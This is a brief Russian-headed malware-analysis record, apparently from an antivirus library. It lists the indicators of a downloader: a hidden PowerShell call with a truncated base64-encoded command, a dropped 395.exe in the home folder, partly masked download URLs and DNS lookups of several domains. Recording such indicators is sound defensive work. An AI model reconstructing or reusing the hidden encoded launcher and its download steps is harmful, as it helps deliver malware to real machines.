Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABBAGkAcwB4AGoAZwBmAHAAYwBzAD0AJwBTAG0AbwBmAGsAYQBkAGgAcAAnADsAJABTAGkAYwB2AG4AeQBxAGUAYwBuAG8AIAA9ACAAJwAzADkANQAnADsAJABHAHMAdAB6AHkAaABlAGoAZAB4AHUAdAA9ACc...
- %HOMEPATH%\395.exe
- %HOMEPATH%\395.exe
- http://se#####tinokumus.com/cgi-bin/d93d5560175/
- http://re##fil.com/lqrvboo/6634/
- DNS ASK bo##.###talbookings.info
- DNS ASK sm#####zz-afrika.com
- DNS ASK se#####tinokumus.com
- DNS ASK re##fil.com
- DNS ASK sc###hnovin.com